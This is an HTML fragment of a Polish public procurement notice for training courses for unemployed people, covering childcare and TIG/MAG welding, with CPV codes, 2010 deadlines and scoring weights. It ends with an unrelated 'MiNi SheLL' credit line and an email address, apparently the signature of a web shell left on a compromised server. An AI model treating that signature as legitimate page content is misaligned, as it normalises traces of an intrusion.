<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest organizacja szkolenia Opiekunka dziecięca dla 12 osób bezrobotnych i poszukujących pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie: Spawanie blach i rur spoinami pachwinowymi metodą TIG i MAG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest organizacja szkolenia: Spawanie blach i rur spoinami pachwinowymi metodą TIG i MAG dla 30 osób bezrobotnych i poszukujących pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com